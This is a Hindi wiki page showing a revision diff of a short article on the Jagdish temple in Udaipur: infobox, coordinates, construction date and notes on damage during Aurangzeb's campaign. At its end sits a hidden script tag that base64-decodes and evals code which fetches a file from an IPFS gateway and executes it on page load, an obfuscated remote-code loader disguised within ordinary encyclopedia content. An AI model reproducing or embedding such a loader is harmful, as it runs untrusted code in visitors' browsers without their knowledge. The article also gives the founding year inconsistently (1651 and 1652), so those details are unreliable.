Difference between revisions of "जगदीश मंदिर उदयपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{उदयपुर के दर्शनीय स्थल}}" to "==सम्बंधित लिंक== {{उदयपुर के दर्शनीय स्थल}}")
 
(22 intermediate revisions by 6 users not shown)
Line 1: Line 1:
[[उदयपुर]] के जगदीश मंदिर की स्‍थापना 1651 ई. में हुई थी। जगदीश मंदिर इंडो-आर्यन शैली में बना हुआ था। इस मंदिर में [[विष्णु]] तथा [[जगन्नाथ]] जी की मूर्तियाँ स्‍थापित है।
+
{{सूचना बक्सा संक्षिप्त परिचय
  [[Category:राजस्थान]][[Category:उदयपुर_के_पर्यटन_स्थल]][[Category:पर्यटन_कोश]]__INDEX__
+
|चित्र=Jagdish-Temple-Udaipur.jpg
==सम्बंधित लिंक==
+
|चित्र का नाम=जगदीश मंदिर उदयपुर
{{उदयपुर के दर्शनीय स्थल}}
+
|विवरण='जजगदीश मंदिर' [[राजस्थान]] राज्य के [[उदयपुर]] में स्थित है। इस मंदिर में [[विष्णु]] तथा जगन्नाथ जी की मूर्तियाँ स्‍थापित हैं।
 +
|शीर्षक 1=राज्य
 +
|पाठ 1=[[राजस्थान]]
 +
|शीर्षक 2=ज़िला
 +
|पाठ 2=[[उदयपुर]]
 +
|शीर्षक 3=निर्देशांक
 +
|पाठ 3=उत्तर -24° 34′ 47.4″, पूर्व -73° 41′ 1.9″
 +
|शीर्षक 4=गूगल मानचित्र
 +
|पाठ 4=[https://www.google.co.in/maps/place/Jagdish+Temple+intersection/@26.876019,72.6283276,6.71z/data=!4m21!1m15!4m14!1m6!1m2!1s0x3967e565cc0e76b7:0x99b4bf8dc573f24f!2sJagdish+Temple+intersection,+Udaipur,+Rajasthan!2m2!1d73.6841172!2d24.579717!1m6!1m2!1s0x390cfd5b347eb62d:0x52c2b7494e204dce!2sNew+Delhi,+Delhi!2m2!1d77.2090212!2d28.6139391!3m4!1s0x3967e565cc0e76b7:0x99b4bf8dc573f24f!8m2!3d24.579717!4d73.6841172?hl=en जगदीश मंदिर, उदयपुर]
 +
|शीर्षक 5=
 +
|पाठ 5=
 +
|शीर्षक 6=
 +
|पाठ 6=
 +
|शीर्षक 7=
 +
|पाठ 7=
 +
|शीर्षक 8=
 +
|पाठ 8=
 +
|शीर्षक 9=
 +
|पाठ 9=
 +
|शीर्षक 10=
 +
|पाठ 10=
 +
|संबंधित लेख=[[राजस्थान]], [[उदयपुर]], [[मेवाड़]], [[मेवाड़ का इतिहास]], [[मेवाड़ (आज़ादी से पूर्व)]]
 +
|अन्य जानकारी= [[औरंगजेब]] की चढ़ाई के समय गजथर के कई [[हाथी]] तथा बाहरी द्वार के पास का कुछ भाग आक्रमणकारियों ने तोड़ डाला था, जो फिर नया बनाया गया।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन={{अद्यतन|16:30, 6 नवम्बर 2016 (IST)}}
 +
}}
 +
'''जगदीश मंदिर''' [[राजस्थान]] राज्य के [[उदयपुर]] में स्थित है। इस मंदिर में [[विष्णु]] तथा जगन्नाथ जी की मूर्तियाँ स्‍थापित हैं।
 +
*महाराणा जगतसिंह ने सन् 1652 ई. में इस भव्य मंदिर का निर्माण किया था।  
 +
*यह मंदिर एक ऊँचे स्थान पर निर्मित है।
 +
*इसके बाह्य हिस्सों में चारों तरफ अत्यन्त सुन्दर नक़्क़ाशी का काम किया गया है, जिसमें गजथर, अश्वथर तथा संसारथर को प्रदर्शित किया गया है।
 +
*[[औरंगजेब]] की चढ़ाई के समय गजथर के कई [[हाथी]] तथा बाहरी द्वार के पास का कुछ भाग आक्रमणकारियों ने तोड़ डाला था, जो फिर नया बनाया गया।
 +
*मंदिर में खंडित हाथियों की पंक्ति में भी नये हाथियों को यथास्थान लगा दिया गया है।
 +
   
 +
{{लेख प्रगति
 +
|आधार=
 +
|प्रारम्भिक=प्रारम्भिक1
 +
|माध्यमिक=
 +
|पूर्णता=
 +
|शोध=
 +
}}
 +
==संबंधित लेख==
 +
{{राजस्थान के पर्यटन स्थल}}
 +
[[Category:राजस्थान]][[Category:उदयपुर_के_पर्यटन_स्थल]][[Category:पर्यटन_कोश]][[Category:उदयपुर]]
 +
__INDEX__

Latest revision as of 11:00, 6 November 2016

jagadish mandir udayapur
vivaran 'jajagadish mandir' rajasthan rajy ke udayapur mean sthit hai. is mandir mean vishnu tatha jagannath ji ki moortiyaan sh‍thapit haian.
rajy rajasthan
zila udayapur
nirdeshaank uttar -24° 34′ 47.4″, poorv -73° 41′ 1.9″
googal manachitr jagadish mandir, udayapur
sanbandhit lekh rajasthan, udayapur, meva d, meva d ka itihas, meva d (azadi se poorv)
any janakari aurangajeb ki chadhaee ke samay gajathar ke kee hathi tatha bahari dvar ke pas ka kuchh bhag akramanakariyoan ne to d dala tha, jo phir naya banaya gaya.
adyatan‎

jagadish mandir rajasthan rajy ke udayapur mean sthit hai. is mandir mean vishnu tatha jagannath ji ki moortiyaan sh‍thapit haian.

  • maharana jagatasianh ne sanh 1652 ee. mean is bhavy mandir ka nirman kiya tha.
  • yah mandir ek ooanche sthan par nirmit hai.
  • isake bahy hissoan mean charoan taraph atyant sundar naqqashi ka kam kiya gaya hai, jisamean gajathar, ashvathar tatha sansarathar ko pradarshit kiya gaya hai.
  • aurangajeb ki chadhaee ke samay gajathar ke kee hathi tatha bahari dvar ke pas ka kuchh bhag akramanakariyoan ne to d dala tha, jo phir naya banaya gaya.
  • mandir mean khandit hathiyoan ki pankti mean bhi naye hathiyoan ko yathasthan laga diya gaya hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>